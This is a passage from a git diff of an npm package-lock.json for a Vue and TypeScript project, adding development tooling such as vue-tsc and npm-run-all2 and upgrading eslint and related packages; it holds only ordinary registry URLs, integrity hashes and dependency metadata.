+ "minimatch": "9.0.3", + "semver": "^7.5.4", + "ts-api-utils": "^1.0.1" + }, + "engines": { + "node": "^18.18.0 || >=20.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@vue/eslint-config-typescript/node_modules/@typescript-eslint/utils": { + "version": "7.4.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/utils/-/utils-7.4.0.tgz", + "integrity": "sha512-NQt9QLM4Tt8qrlBVY9lkMYzfYtNz8/6qwZg8pI3cMGlPnj6mOpRxxAm7BMJN9K0AiY+1BwJ5lVC650YJqYOuNg==", + "dev": true, + "dependencies": { + "@eslint-community/eslint-utils": "^4.4.0", + "@types/json-schema": "^7.0.12", + "@types/semver": "^7.5.0", + "@typescript-eslint/scope-manager": "7.4.0", + "@typescript-eslint/types": "7.4.0", + "@typescript-eslint/typescript-estree": "7.4.0", + "semver": "^7.5.4" + }, + "engines": { + "node": "^18.18.0 || >=20.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + }, + "peerDependencies": { + "eslint": "^8.56.0" + } + }, + "node_modules/@vue/eslint-config-typescript/node_modules/@typescript-eslint/visitor-keys": { + "version": "7.4.0", + "resolved": "https://registry.npmjs.org/@typescript-eslint/visitor-keys/-/visitor-keys-7.4.0.tgz", + "integrity": "sha512-0zkC7YM0iX5Y41homUUeW1CHtZR01K3ybjM1l6QczoMuay0XKtrb93kv95AxUGwdjGr64nNqnOCwmEl616N8CA==", + "dev": true, + "dependencies": { + "@typescript-eslint/types": "7.4.0", + "eslint-visitor-keys": "^3.4.1" + }, + "engines": { + "node": "^18.18.0 || >=20.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/typescript-eslint" + } + }, + "node_modules/@vue/eslint-config-typescript/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/@vue/eslint-config-typescript/node_modules/minimatch": { + "version": "9.0.3", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.3.tgz", + "integrity": "sha512-RHiac9mvaRw0x3AYRgDC1CxAP7HTcNrrECeA8YYJeWnpo+2Q5CegtZjaotWTWxDG3UeGA1coE05iH1mPjT/2mg==", + "dev": true, + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/@vue/language-core": { + "version": "2.0.7", + "resolved": "https://registry.npmjs.org/@vue/language-core/-/language-core-2.0.7.tgz", + "integrity": "sha512-Vh1yZX3XmYjn9yYLkjU8DN6L0ceBtEcapqiyclHne8guG84IaTzqtvizZB1Yfxm3h6m7EIvjerLO5fvOZO6IIQ==", + "dev": true, + "dependencies": { + "@volar/language-core": "~2.1.3", + "@vue/compiler-dom": "^3.4.0", + "@vue/shared": "^3.4.0", + "computeds": "^0.0.1", + "minimatch": "^9.0.3", + "path-browserify": "^1.0.1", + "vue-template-compiler": "^2.7.14" + }, + "peerDependencies": { + "typescript": "*" + }, + "peerDependenciesMeta": { + "typescript": { + "optional": true + } + } + }, + "node_modules/@vue/language-core/node_modules/@vue/compiler-core": { + "version": "3.4.21", + "resolved": "https://registry.npmjs.org/@vue/compiler-core/-/compiler-core-3.4.21.tgz", + "integrity": "sha512-MjXawxZf2SbZszLPYxaFCjxfibYrzr3eYbKxwpLR9EQN+oaziSu3qKVbwBERj1IFIB8OLUewxB5m/BFzi613og==", + "dev": true, + "dependencies": { + "@babel/parser": "^7.23.9", + "@vue/shared": "3.4.21", + "entities": "^4.5.0", + "estree-walker": "^2.0.2", + "source-map-js": "^1.0.2" + } + }, + "node_modules/@vue/language-core/node_modules/@vue/compiler-dom": { + "version": "3.4.21", + "resolved": "https://registry.npmjs.org/@vue/compiler-dom/-/compiler-dom-3.4.21.tgz", + "integrity": "sha512-IZC6FKowtT1sl0CR5DpXSiEB5ayw75oT2bma1BEhV7RRR1+cfwLrxc2Z8Zq/RGFzJ8w5r9QtCOvTjQgdn0IKmA==", + "dev": true, + "dependencies": { + "@vue/compiler-core": "3.4.21", + "@vue/shared": "3.4.21" + } + }, + "node_modules/@vue/language-core/node_modules/@vue/shared": { + "version": "3.4.21", + "resolved": "https://registry.npmjs.org/@vue/shared/-/shared-3.4.21.tgz", + "integrity": "sha512-PuJe7vDIi6VYSinuEbUIQgMIRZGgM8e4R+G+/dQTk0X1NEdvgvvgv7m+rfmDH1gZzyA1OjjoWskvHlfRNfQf3g==", + "dev": true + }, + "node_modules/@vue/language-core/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/@vue/language-core/node_modules/minimatch": { + "version": "9.0.4", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.4.tgz", + "integrity": "sha512-KqWh+VchfxcMNRAJjj2tnsSJdNbHsVgnkBhTNrW7AjVo6OvLtxw8zfT9oLw1JSohlFzJ8jCoTgaoXvJ+kHt6fw==", + "dev": true, + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, "node_modules/@vue/reactivity": { "version": "3.2.45", "resolved": "https://registry.npmjs.org/@vue/reactivity/-/reactivity-3.2.45.tgz", @@ -829,10 +1230,16 @@ "resolved": "https://registry.npmjs.org/@vue/shared/-/shared-3.2.45.tgz", "integrity": "sha512-Ewzq5Yhimg7pSztDV+RH1UDKBzmtqieXQlpTVm2AwraoRL/Rks96mvd8Vgi7Lj+h+TH8dv7mXD3FRZR3TUvbSg==" }, + "node_modules/@vue/tsconfig": { + "version": "0.5.1", + "resolved": "https://registry.npmjs.org/@vue/tsconfig/-/tsconfig-0.5.1.tgz", + "integrity": "sha512-VcZK7MvpjuTPx2w6blwnwZAu5/LgBUtejFOi3pPGQFXQN5Ela03FUtd2Qtg4yWGGissVL0dr6Ro1LfOFh+PCuQ==", + "dev": true + }, "node_modules/acorn": { - "version": "8.8.2", - "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.8.2.tgz", - "integrity": "sha512-xjIYgE8HBrkpd/sJqOGNspf8uHG+NOHGOw6a/Urj8taM2EXfdNAH2oFcPeIFfsv3+kz/mJrS5VuMqbNLjCa2vw==", + "version": "8.11.3", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.11.3.tgz", + "integrity": "sha512-Y9rRfJG5jcKOE0CLisYbojUjIrIEE7AGMzA/Sm4BslANhbS+cDMpgBdcPT91oJ7OuJ9hYJBx59RjbhxVnrF8Xg==", "dev": true, "bin": { "acorn": "bin/acorn" @@ -1167,6 +1574,12 @@ "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", "dev": true }, + "node_modules/computeds": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/computeds/-/computeds-0.0.1.tgz", + "integrity": "sha512-7CEBgcMjVmitjYo5q8JTJVra6X5mQ20uTThdK+0kR7UEaDrAWEQcRiBtWJzga4eRpP6afNwwLsX2SET2JhVB1Q==", + "dev": true + }, "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", @@ -1204,6 +1617,12 @@ "resolved": "https://registry.npmjs.org/csstype/-/csstype-2.6.21.tgz", "integrity": "sha512-Z1PhmomIfypOpoMjRQB70jfvy/wxT50qW08YXO5lMIJkrdq4yOTR+AW7FqutScmB9NkLwxo+jU+kZLbofZZq/w==" }, + "node_modules/de-indent": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/de-indent/-/de-indent-1.0.2.tgz", + "integrity": "sha512-e/1zu3xH5MQryN2zdVaF0OrdNLUbvWxzMbi+iNA6Bky7l1RoP8a2fIbRocyHclXt/arDrrR6lL3TqFD9pMQTsg==", + "dev": true + }, "node_modules/debug": { "version": "4.3.4", "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", @@ -1295,6 +1714,18 @@ "integrity": "sha512-M8WEXFuKXMYMVr45fo8mq0wUrrJHheiKZf6BArTKk9ZBYCKJEOU5H8cdWgDT+qCVZf7Na4lVUaZsA+h6uA9+PA==", "dev": true }, + "node_modules/entities": { + "version": "4.5.0", + "resolved": "https://registry.npmjs.org/entities/-/entities-4.5.0.tgz", + "integrity": "sha512-V0hjH4dGPh9Ao5p0MoRY6BVqtwCjhz6vI5LT8AJ55H+4g9/4vbHx1I54fS0XuclLhDHArPQCiMjDxjaL8fPxhw==", + "dev": true, + "engines": { + "node": ">=0.12" + }, + "funding": { + "url": "https://github.com/fb55/entities?sponsor=1" + } + }, "node_modules/esbuild": { "version": "0.18.20", "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.18.20.tgz", @@ -1354,49 +1785,48 @@ } }, "node_modules/eslint": { - "version": "8.32.0", - "resolved": "https://registry.npmjs.org/eslint/-/eslint-8.32.0.tgz", - "integrity": "sha512-nETVXpnthqKPFyuY2FNjz/bEd6nbosRgKbkgS/y1C7LJop96gYHWpiguLecMHQ2XCPxn77DS0P+68WzG6vkZSQ==", + "version": "8.57.0", + "resolved": "https://registry.npmjs.org/eslint/-/eslint-8.57.0.tgz", + "integrity": "sha512-dZ6+mexnaTIbSBZWgou51U6OmzIhYM2VcNdtiTtI7qPNZm35Akpr0f6vtw3w1Kmn5PYo+tZVfh13WrhpS6oLqQ==", "dev": true, "dependencies": { - "@eslint/eslintrc": "^1.4.1", - "@humanwhocodes/config-array": "^0.11.8", + "@eslint-community/eslint-utils": "^4.2.0", + "@eslint-community/regexpp": "^4.6.1", + "@eslint/eslintrc": "^2.1.4", + "@eslint/js": "8.57.0", + "@humanwhocodes/config-array": "^0.11.14", "@humanwhocodes/module-importer": "^1.0.1", "@nodelib/fs.walk": "^1.2.8", - "ajv": "^6.10.0", + "@ungap/structured-clone": "^1.2.0", + "ajv": "^6.12.4", "chalk": "^4.0.0", "cross-spawn": "^7.0.2", "debug": "^4.3.2", "doctrine": "^3.0.0", "escape-string-regexp": "^4.0.0", - "eslint-scope": "^7.1.1", - "eslint-utils": "^3.0.0", - "eslint-visitor-keys": "^3.3.0", - "espree": "^9.4.0", - "esquery": "^1.4.0", + "eslint-scope": "^7.2.2", + "eslint-visitor-keys": "^3.4.3", + "espree": "^9.6.1", + "esquery": "^1.4.2", "esutils": "^2.0.2", "fast-deep-equal": "^3.1.3", "file-entry-cache": "^6.0.1", "find-up": "^5.0.0", "glob-parent": "^6.0.2", "globals": "^13.19.0", - "grapheme-splitter": "^1.0.4", + "graphemer": "^1.4.0", "ignore": "^5.2.0", - "import-fresh": "^3.0.0", "imurmurhash": "^0.1.4", "is-glob": "^4.0.0", "is-path-inside": "^3.0.3", - "js-sdsl": "^4.1.4", "js-yaml": "^4.1.0", "json-stable-stringify-without-jsonify": "^1.0.1", "levn": "^0.4.1", "lodash.merge": "^4.6.2", "minimatch": "^3.1.2", "natural-compare": "^1.4.0", - "optionator": "^0.9.1", - "regexpp": "^3.2.0", + "optionator": "^0.9.3", "strip-ansi": "^6.0.1", - "strip-json-comments": "^3.1.0", "text-table": "^0.2.0" }, "bin": { @@ -1431,9 +1861,9 @@ } }, "node_modules/eslint-scope": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/eslint-scope/-/eslint-scope-7.1.1.tgz", - "integrity": "sha512-QKQM/UXpIiHcLqJ5AOyIW7XZmzjkzQXYE54n1++wb0u9V/abW3l9uQnxX8Z5Xd18xyKIMTUAyQ0k1e8pz6LUrw==", + "version": "7.2.2", + "resolved": "https://registry.npmjs.org/eslint-scope/-/eslint-scope-7.2.2.tgz", + "integrity": "sha512-dOt21O7lTMhDM+X9mB4GX+DZrZtCUJPL/wlcTqxyrx5IvO0IYtILdtrQGQp+8n5S0gwSVmOf9NQrjMOgfQZlIg==", "dev": true, "dependencies": { "esrecurse": "^4.3.0", @@ -1441,6 +1871,9 @@ }, "engines": { "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" } }, "node_modules/eslint-utils": { @@ -1471,23 +1904,26 @@ } }, "node_modules/eslint-visitor-keys": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.3.0.tgz", - "integrity": "sha512-mQ+suqKJVyeuwGYHAdjMFqjCyfl8+Ldnxuyp3ldiMBFKkvytrXUZWaiPCEav8qDHKty44bD+qV1IP4T+w+xXRA==", + "version": "3.4.3", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.3.tgz", + "integrity": "sha512-wpc+LXeiyiisxPlEkUzU6svyS1frIO3Mgxj1fdy7Pm8Ygzguax2N3Fa/D/ag1WqbOprdI+uY6wMUl8/a2G+iag==", "dev": true, "engines": { "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" } }, "node_modules/espree": { - "version": "9.4.1", - "resolved": "https://registry.npmjs.org/espree/-/espree-9.4.1.tgz", - "integrity": "sha512-XwctdmTO6SIvCzd9810yyNzIrOrqNYV9Koizx4C/mRhf9uq0o4yHoCEU/670pOxOL/MSraektvSAji79kX90Vg==", + "version": "9.6.1", + "resolved": "https://registry.npmjs.org/espree/-/espree-9.6.1.tgz", + "integrity": "sha512-oruZaFkjorTpF32kDSI5/75ViwGeZginGGy2NoOSg3Q9bnwlnmDm4HLnkl0RE3n+njDXR037aY1+x58Z/zFdwQ==", "dev": true, "dependencies": { - "acorn": "^8.8.0", + "acorn": "^8.9.0", "acorn-jsx": "^5.3.2", - "eslint-visitor-keys": "^3.3.0" + "eslint-visitor-keys": "^3.4.1" }, "engines": { "node": "^12.22.0 || ^14.17.0 || >=16.0.0" @@ -1497,9 +1933,9 @@ } }, "node_modules/esquery": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/esquery/-/esquery-1.4.0.tgz", - "integrity": "sha512-cCDispWt5vHHtwMY2YrAQ4ibFkAL8RbH5YGBnZBc90MolvvfkkQcJro/aZiAQUlQ3qgrYS6D6v8Gc5G5CQsc9w==", + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/esquery/-/esquery-1.5.0.tgz", + "integrity": "sha512-YQLXUplAwJgCydQ78IMJywZCceoqk1oH01OERdSAJc/7U2AylwjhSCLDEtqwg811idIS/9fIU5GjG73IgjKMVg==", "dev": true, "dependencies": { "estraverse": "^5.1.0" @@ -1729,9 +2165,9 @@ } }, "node_modules/globals": { - "version": "13.19.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-13.19.0.tgz", - "integrity": "sha512-dkQ957uSRWHw7CFXLUtUHQI3g3aWApYhfNR2O6jn/907riyTYKVBmxYVROkBcY614FSSeSJh7Xm7SrUWCxvJMQ==", + "version": "13.24.0", + "resolved": "https://registry.npmjs.org/globals/-/globals-13.24.0.tgz", + "integrity": "sha512-AhO5QUcj8llrbG09iWhPU2B204J1xnPeL8kQmVorSsy+Sjj1sk8gIyh6cUocGmH4L0UuhAJy+hJMRA4mgA4mFQ==", "dev": true, "dependencies": { "type-fest": "^0.20.2" @@ -1769,6 +2205,12 @@ "integrity": "sha512-bzh50DW9kTPM00T8y4o8vQg89Di9oLJVLW/KaOGIXJWP/iqCN6WKYkbNOF04vFLJhwcpYUh9ydh/+5vpOqV4YQ==", "dev": true }, + "node_modules/graphemer": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/graphemer/-/graphemer-1.4.0.tgz", + "integrity": "sha512-EtKwoO6kxCL9WO5xipiHTZlSzBm7WLT627TqC/uVRd0HKmq8NXyebnNYxDoBi7wt8eTWrUrKXCOVaFq9x1kgag==", + "dev": true + }, "node_modules/has": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", @@ -1790,6 +2232,15 @@ "node": ">=8" } }, + "node_modules/he": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/he/-/he-1.2.0.tgz", + "integrity": "sha512-F/1DnUGPopORZi0ni+CvrCgHQ5FyEAHRLSApuYWMmrbSwoN2Mn/7k+Gl38gJnR7yyDZk6WLXwiGod1JOWNDKGw==", + "dev": true, + "bin": { + "he": "bin/he" + } + }, "node_modules/ignore": { "version": "5.2.4", "resolved": "https://registry.npmjs.org/ignore/-/ignore-5.2.4.tgz", @@ -1909,16 +2360,6 @@ "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", "dev": true }, - "node_modules/js-sdsl": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/js-sdsl/-/js-sdsl-4.3.0.tgz", - "integrity": "sha512-mifzlm2+5nZ+lEcLJMoBK0/IH/bDg8XnJfd/Wq6IP+xoCjLZsTOnV2QpxlVbX9bMnkl5PdEjNtBJ9Cj1NjifhQ==", - "dev": true, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/js-sdsl" - } - }, "node_modules/js-yaml": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", @@ -1931,6 +2372,15 @@ "js-yaml": "bin/js-yaml.js" } }, + "node_modules/json-parse-even-better-errors": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-3.0.1.tgz", + "integrity": "sha512-aatBvbL26wVUCLmbWdCpeu9iF5wOyWpagiKkInA+kfws3sWdBrTnsvN2CKcyCYyUrc7rebNBlK6+kteg7ksecg==", + "dev": true, + "engines": { + "node": "^14.17.0 || ^16.13.0 || >=18.0.0" + } + }, "node_modules/json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", @@ -2012,6 +2462,15 @@ "sourcemap-codec": "^1.4.8" } }, + "node_modules/memorystream": { + "version": "0.3.1", + "resolved": "https://registry.npmjs.org/memorystream/-/memorystream-0.3.1.tgz", + "integrity": "sha512-S3UwM3yj5mtUSEfP41UZmt/0SCoVYUcU1rkXv+BQ5Ig8ndL4sPoJNBUJERafdPb5jjHJGuMgytgKvKIf58XNBw==", + "dev": true, + "engines": { + "node": ">= 0.10.0" + } + }, "node_modules/merge2": { "version": "1.4.1", "resolved": "https://registry.npmjs.org/merge2/-/merge2-1.4.1.tgz", @@ -2061,6 +2520,12 @@ "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", "dev": true }, + "node_modules/muggle-string": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/muggle-string/-/muggle-string-0.4.1.tgz", + "integrity": "sha512-VNTrAak/KhO2i8dqqnqnAHOa3cYBwXEZe9h+D5h/1ZqFSTEFHdM65lR7RoIqq3tBBYavsOXV84NoHXZ0AkPyqQ==", + "dev": true + }, "node_modules/nanoid": { "version": "3.3.7", "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.3.7.tgz", @@ -2114,6 +2579,76 @@ "node": ">=0.10.0" } }, + "node_modules/npm-normalize-package-bin": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/npm-normalize-package-bin/-/npm-normalize-package-bin-3.0.1.tgz", + "integrity": "sha512-dMxCf+zZ+3zeQZXKxmyuCKlIDPGuv8EF940xbkC4kQVDTtqoh6rJFO+JTKSA6/Rwi0getWmtuy4Itup0AMcaDQ==", + "dev": true, + "engines": { + "node": "^14.17.0 || ^16.13.0 || >=18.0.0" + } + }, + "node_modules/npm-run-all2": { + "version": "6.1.2", + "resolved": "https://registry.npmjs.org/npm-run-all2/-/npm-run-all2-6.1.2.tgz", + "integrity": "sha512-WwwnS8Ft+RpXve6T2EIEVpFLSqN+ORHRvgNk3H9N62SZXjmzKoRhMFg3I17TK3oMaAEr+XFbRirWS2Fn3BCPSg==", + "dev": true, + "dependencies": { + "ansi-styles": "^6.2.1", + "cross-spawn": "^7.0.3", + "memorystream": "^0.3.1", + "minimatch": "^9.0.0", + "pidtree": "^0.6.0", + "read-package-json-fast": "^3.0.2", + "shell-quote": "^1.7.3" + }, + "bin": { + "npm-run-all": "bin/npm-run-all/index.js", + "npm-run-all2": "bin/npm-run-all/index.js", + "run-p": "bin/run-p/index.js", + "run-s": "bin/run-s/index.js" + }, + "engines": { + "node": "^14.18.0 || >=16.0.0", + "npm": ">= 8" + } + }, + "node_modules/npm-run-all2/node_modules/ansi-styles": { + "version": "6.2.1", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", + "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==", + "dev": true, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/npm-run-all2/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/npm-run-all2/node_modules/minimatch": { + "version": "9.0.4", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.4.tgz", + "integrity": "sha512-KqWh+VchfxcMNRAJjj2tnsSJdNbHsVgnkBhTNrW7AjVo6OvLtxw8zfT9oLw1JSohlFzJ8jCoTgaoXvJ+kHt6fw==", + "dev": true, + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, "node_modules/nth-check": { "version": "2.1.1", "resolved": "https://registry.npmjs.org/nth-check/-/nth-check-2.1.1.tgz", @@ -2145,17 +2680,17 @@ } }, "node_modules/optionator": { - "version": "0.9.1", - "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.9.1.tgz", - "integrity": "sha512-74RlY5FCnhq4jRxVUPKDaRwrVNXMqsGsiW6AJw4XK8hmtm10wC0ypZBLw5IIp85NZMr91+qd1RvvENwg7jjRFw==", + "version": "0.9.3", + "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.9.3.tgz", + "integrity": "sha512-JjCoypp+jKn1ttEFExxhetCKeJt9zhAgAve5FXHixTvFDW/5aEktX9bufBKLRRMdU7bNtpLfcGu94B3cdEJgjg==", "dev": true, "dependencies": { + "@aashutoshrathi/word-wrap": "^1.2.3", "deep-is": "^0.1.3", "fast-levenshtein": "^2.0.6", "levn": "^0.4.1", "prelude-ls": "^1.2.1", - "type-check": "^0.4.0", - "word-wrap": "^1.2.3" + "type-check": "^0.4.0" }, "engines": { "node": ">= 0.8.0" @@ -2203,6 +2738,12 @@ "node": ">=6" } }, + "node_modules/path-browserify": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/path-browserify/-/path-browserify-1.0.1.tgz", + "integrity": "sha512-b7uo2UCUOYZcnF/3ID0lulOJi/bafxa1xPe7ZPsammBSpjSWQkjNxlt635YGS2MiR9GjvuXCtz2emr3jbsz98g==", + "dev": true + }, "node_modules/path-exists": { "version": "4.0.0", "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", @@ -2262,6 +2803,18 @@ "url": "https://github.com/sponsors/jonschlinkert" } }, + "node_modules/pidtree": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/pidtree/-/pidtree-0.6.0.tgz", + "integrity": "sha512-eG2dWTVw5bzqGRztnHExczNxt5VGsE6OwTeCG3fdUf9KBsZzO3R5OIIIzWR+iZA0NtZ+RDVdaoE2dK1cn6jH4g==", + "dev": true, + "bin": { + "pidtree": "bin/pidtree.js" + }, + "engines": { + "node": ">=0.10" + } + }, "node_modules/pify": { "version": "2.3.0", "resolved": "https://registry.npmjs.org/pify/-/pify-2.3.0.tgz", @@ -2469,9 +3022,9 @@ } }, "node_modules/punycode": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.0.tgz", - "integrity": "sha512-rRV+zQD8tVFys26lAGR9WUuS4iUAngJScM+ZRSKtvl5tKeZ2t5bvdNFdNHBW9FWR4guGHlgmsZ1G7BSm2wTbuA==", + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", + "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", "dev": true, "engines": { "node": ">=6" @@ -2518,6 +3071,19 @@ "pify": "^2.3.0" } }, + "node_modules/read-package-json-fast": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/read-package-json-fast/-/read-package-json-fast-3.0.2.tgz", + "integrity": "sha512-0J+Msgym3vrLOUB3hzQCuZHII0xkNGCtz/HJH9xZshwv9DbDwkw1KaE3gx/e2J5rpEY5rtOy6cyhKOPrkP7FZw==", + "dev": true, + "dependencies": { + "json-parse-even-better-errors": "^3.0.0", + "npm-normalize-package-bin": "^3.0.0" + }, + "engines": { + "node": "^14.17.0 || ^16.13.0 || >=18.0.0" + } + }, "node_modules/readdirp": { "version": "3.6.0", "resolved": "https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz", @@ -2668,6 +3234,15 @@ "node": ">=8" } }, + "node_modules/shell-quote": { + "version": "1.8.1", + "resolved": "https://registry.npmjs.org/shell-quote/-/shell-quote-1.8.1.tgz", + "integrity": "sha512-6j1W9l1iAs/4xYBI1SYOVZyFcCis9b4KCLQ8fgAGG07QvzaRLVVRQvAy85yNmmZSjYjg4MWh4gNvlPujU/5LpA==", + "dev": true, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, "node_modules/slash": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", @@ -2806,6 +3381,18 @@ "node": ">=8.0" } }, + "node_modules/ts-api-utils": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/ts-api-utils/-/ts-api-utils-1.3.0.tgz", + "integrity": "sha512-UQMIo7pb8WRomKR1/+MFVLTroIvDVtMX3K6OUir8ynLyzB8Jeriont2bTAtmNPa1ekAgN7YPDyf6V+ygrdU+eQ==", + "dev": true, + "engines": { + "node": ">=16" + }, + "peerDependencies": { + "typescript": ">=4.2.0" + } + }, "node_modules/tslib": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", @@ -2973,9 +3560,9 @@ } }, "node_modules/vue-eslint-parser": { - "version": "9.1.0", - "resolved": "https://registry.npmjs.org/vue-eslint-parser/-/vue-eslint-parser-9.1.0.tgz", - "integrity": "sha512-NGn/iQy8/Wb7RrRa4aRkokyCZfOUWk19OP5HP6JEozQFX5AoS/t+Z0ZN7FY4LlmWc4FNI922V7cvX28zctN8dQ==", + "version": "9.4.2", + "resolved": "https://registry.npmjs.org/vue-eslint-parser/-/vue-eslint-parser-9.4.2.tgz", + "integrity": "sha512-Ry9oiGmCAK91HrKMtCrKFWmSFWvYkpGglCeFAIqDdr9zdXmMMpJOmUJS7WWsW7fX81h6mwHmUZCQQ1E0PkSwYQ==", "dev": true, "dependencies": { "debug": "^4.3.4", @@ -3010,6 +3597,33 @@ "vue": "^3.2.0" } }, + "node_modules/vue-template-compiler": { + "version": "2.7.16", + "resolved": "https://registry.npmjs.org/vue-template-compiler/-/vue-template-compiler-2.7.16.tgz", + "integrity": "sha512-AYbUWAJHLGGQM7+cNTELw+KsOG9nl2CnSv467WobS5Cv9uk3wFcnr1Etsz2sEIHEZvw1U+o9mRlEO6QbZvUPGQ==", + "dev": true, + "dependencies": { + "de-indent": "^1.0.2", + "he": "^1.2.0" + } + }, + "node_modules/vue-tsc": { + "version": "2.0.7", + "resolved": "https://registry.npmjs.org/vue-tsc/-/vue-tsc-2.0.7.tgz", + "integrity": "sha512-LYa0nInkfcDBB7y8jQ9FQ4riJTRNTdh98zK/hzt4gEpBZQmf30dPhP+odzCa+cedGz6B/guvJEd0BavZaRptjg==", + "dev": true, + "dependencies": { + "@volar/typescript": "~2.1.3", + "@vue/language-core": "2.0.7", + "semver": "^7.5.4" + }, + "bin": { + "vue-tsc": "bin/vue-tsc.js" + }, + "peerDependencies": { + "typescript": "*" + } + }, "node_modules/which": { "version": "2.0.2", "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", @@ -3025,15 +3639,6 @@ "node": ">= 8" } }, - "node_modules/word-wrap": { - "version": "1.2.5", - "resolved": 